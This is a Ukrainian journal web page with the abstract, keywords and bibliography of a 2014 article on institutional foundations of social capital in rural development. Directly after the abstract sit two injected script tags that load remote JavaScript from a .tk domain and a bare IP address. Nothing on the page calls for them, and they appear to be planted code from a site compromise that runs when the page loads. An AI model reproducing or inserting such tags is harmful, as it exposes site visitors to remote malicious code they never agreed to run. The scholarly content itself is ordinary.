ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.1.016:330.837:711.5
Інституціональні проблеми розвитку аграрної сфери

Інституційні засади формування соціального капіталу в механізмі розвитку сільських територій / Шпикуляк О.Г. // Економіка АПК. - 2014. - № 8 - С. 63

Розкрито теоретико-методичні положення і практичні аспекти формування соціального капіталу на селі через застосування інституціональної методології пізнання соціально-економічних процесів та явищ. Висвітлено концептуальне бачення стану й особливостей інституціалізації сільських територій в умовах ринку, конкурентного середовища соціальних взаємодій. Визначено сутністно-функціональні ознаки соціального капіталу як інституту, що виконує функцію саморегулювання господарських і суспільних відносин на сільських територіальних утвореннях. Здійснено оцінку інституційних аспектів формування і становлення соціального капіталу в умовах транзитивної економіки. Розкрито особливості формування соціального капіталу сільських територій як особливого середовища життєдіяльності людей, пов’язаної зі значним впливом природних факторів. Наведено авторську оцінку колективної та індивідуальної складової становлення соціального капіталу як інституційних конструкцій, що забезпечують логіку сільського розвитку. Рис.: 1. Бібліогр. 37.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: соціальний капітал, сільська територія, інституціоналізм, соціум, капітал, інститут, інституція, сталий розвиток

Список використаних джерел

 1. Норт, Даглас. Інституції, інституційна зміна та функціонування економіки / Норт, Даглас. – Пер. з англ. І. Дзюб. – К.: Основи, 2000. – 198 с.
 2. Лопатинський Ю.М. Трансформація аграрного сектора: інституціональні засади / Ю.М. Лопатинський. – Чернівці: Рута, 2006. – 344 с.
 3. Осташко Т.О. Ринкова трансформація аграрного сектора / Т.О. Осташко. – К.: Фенікс, 2004. – 280 с.; С. 49.
 4. Замятіна Н.В. Соціальний капітал як каталізатор сільського розвитку / Н.В. Замятіна // Вісник Сумського національного аграр. ун-ту. – 2005. – №2. – С. 345-353.
 5. Якубенко В.Д. Базисні інститути у трансформаційній економіці: моногр. / В.Д. Якубенко. – К.: КНЕУ, 2004. – 252 с.
 6. Архієрєєв С.І. Трансакційна архітектоніка / С.І. Архієрєєв // Економічна теорія. – 2004. – №1. – С. 69-83.
 7. Бережной В.М. Институциональные преобразования в системе факторов общественной эволюции / В.М. Бережной, С.Ю. Дефорж // Научные труды ДонНТУ. Серия: экономическая. – 2005. – Вып. 89-2. – С. 35-42.
 8. Березовець Л. Розвиток соціального капіталу [Електронний ресурс] / Березовець Л. – 2005. – Режим доступу : http:// www.iu.org.ua/library / Електронна бібліотека. – Портал "Інформаційна Україна".
 9. Блауг, Марк. Економічна теорія в ретроспективі / Блауг, Марк; пер. з англ. І. Дзюб. – К. : Вид-во Соломії Павличко "Основи", 2001. – 670 с.
 10. Бурдье П. Практический смысл [Электронный ресурс] / Бурдье П. – СПб. : [б.и.], 2008. – С. 54. – Режим доступа : http://www.ecsocman.edu.ru.
 11. Вільямсон Олівер Е. Економічні інституції капіталізму: фірми, маркетинг, укладання контрактів / Вільямсон Олівер Е. – К. : АртЕк, 2001. – 472 с.
 12. Вольчик В.В. Роль социального капитала и групп интересов при формировании института власти-собственности в рамках российского хозяйственного порядка [Электронный ресурс] / В.В. Вольчик, И.В. Бережной // Экономический вестник Ростовского государственного университета. – 2006. – Т. 4. № 2. – С. 35–41. – Режим доступа: http://www.ecsocman.edu.ru.
 13. Горожанкина М.Е. Экономический институт в контексте теории социального капитала [Электронный ресурс] / М.Е. Горожанкина // Научные труды ДонНТУ. Серия: экономическая. – 2004. Вып. 70. – С. 70–76. – Режим доступа : http://www.donntu.edu.ua/”Библиотека”/.
 14. Громадянське суспільство і соціальні перетворення в Україні // Наукова конф. ЛНУ ім. І.Франка, філософський факультет, кафедра філософії, 13-15 груд. 2001 р.: тези доп. – Львів, 2001. – С. 54-55.
 15. Демків О. Соціальний капітал: теоретичні засади дослідження та операціональні параметри / О. Демків // Соціологія: теорія, методи, маркетинг. – 2004. – №4. – С. 99-111.
 16. Дж. Коулман. Капитал социальный и человеческий // Общественные науки и современность. – 2001. – № 3. – С. 121–139. [Электронный ресурс] / Дж. Коулман. – Режим доступа : http://www.ecsocman.edu.ru.
 17. Олсон Менкур. Логіка колективної дії. Суспільні блага і теорія груп / Олсон Менкур. – Пер. з англ., післямова Сергія Слухая. – К.: Лібра, 2004. – С. 165.
 18. Дж.М.Ходжсон. Скрытые механизмы убеждения: институты и индивиды в экономической теории / Дж.М.Ходжсон // Экономический вестник Ростовского государственного университета. – 2003. – Т. 1. №4. – С. 11-30.
 19. Дж.Р.Коммонс. Институциональная экономика [Электронный ресурс] / Дж.Р.Коммонс – Режим доступа : http: //ie.boom.ru/Commons/Commons.htm.
 20. Дискин И.Е. Экономическая трансформация и социальный капитал [Электронный ресурс] / И.Е. Дискин // Проблемы прогнозирования. – 1997. – №1. – Режим доступа : http://www.ecsocman.edu.ru.
 21. Дієсперов В.С. Економіка сільськогосподарської праці / Дієсперов В.С. – К. : ІАЕ УААН, 2004. – 488 с.
 22. Дієсперов В.С. Сільськогосподарська праця в нових умовах / Дієсперов В.С. – К. : ІАЕ УААН, 2000. – 186 с.
 23. Концепція розвитку сільських територій до 2030 року. Проект / [П.Т. Саблук, М.Й. Малік, О.Г. Булавка, В.М. Скупий, В.А. Пулім, О.Г. Шпикуляк та ін.]. – К. : ННЦ "ІАЕ" , 2007. – 46 с.
 24. Крістін Форрестер. Наша мета – творення соціального капіталу // Наша громада. –2005. – № 1 [Электронный ресурс] / Крістін Форрестер. – Режим доступу : http://www.dobrobut.org.ua.
 25. Лопатинський Ю.М. Інституціоналізація транзитивної економіки [Електронний ресурс] / Ю.М. Лопатинський // Наукові праці ДонНТУ. Серія: економічна. – 2006. – Вип. 103-1. – С. 229-232. – Режим доступу : http://www.donntu.edu.ua/”Библиотека”/.
 26. Лужанська Т. Професійні громадські організації АПК: спроможність до реалізації нових завдань [Електронний ресурс] / Т. Лужанська // БЮЛ. проекту ПРООН "Аграрна політика для людського розвитку". – 2003. – Вип. 16(16), верес. Режим доступу : http:// www.undp.org.ua.
 27. Малік М.Й. Розвиток підприємництва в аграрному секторі економіки / М.Й. Малік, О.Г. Шпикуляк // Економіка АПК. – 2006. – № 4. – С. 3-10.
 28. Мачеринскене И. Социальный капитал организации. [Электронный ресурс] / Мачеринскене И., Минкуте-Генриксон Р., Симанавичене Ж. – Режим доступа : http://www.ecsocman.edu.ru.
 29. Онищенко В.П. Соціальний контекст євроінтеграційної стратегії України / В.П. Онищенко // Економічна теорія. – 2008. – №2. – C. 60-74.
 30. Полищук Е.А. Социальный капитал и его роль в экономическом развитии [Электронный ресурс] / Е.А. Полищук // Вестник Санкт-Петербургского университета. Сер. 5. – 2005. – Вып. 1. – С. 10–16. – Режим доступа : http://www.ecsocman.edu.ru.
 31. Пьер Бурдье. Социальное партнерство и символическая власть [Электронный ресурс] / Бурдье Пьер. – Режим доступа : http://www.ecsocman.edu.ru.
 32. Радаев В.В. Понятие капитала, формы капиталов и их конвертация [Электронный вариант] / В.В. Радаев // Общественные науки и современность. – 2001. – №2. – Режим доступа : http://www.ecsocman.edu.ru.
 33. Семів Л.К. Сооціальний капітал регіональних суспільних систем: аспекти формування та оцінки в умовах переходу до економіки знань / Л.К. Семів, Р.А. Семів // Соціально-економічні дослідження в перехідний період. Регіональні суспільні системи: [зб. наук пр.]. – 2004. – Вип. 3. – Ч. 1. – С. 104-119.
 34. Hamilton, Walton H. The Inctitutional Approach to Economic Teory / Hamilton, Walton H. // American Economic Review. – 1919. – №9. – P.309-318.
 35. Pryor F.L. Market economic systems / Pryor F.L. // Journal of Comparative Economics, Vol. 33, 2005., P 25-46.
 36. Smith M.K. Social Capital – The encyclopaedia of informal education / Smith M.K. // www.infed.org/biblio/social_capital.htm.
 37. Veblen T. The Plase of Science in Modern Civilization and Other Essays / Veblen T. – N.Y.: Huebsch, 1919. – P. 72-73.
Читати статтю: 14_08_63-68.pdf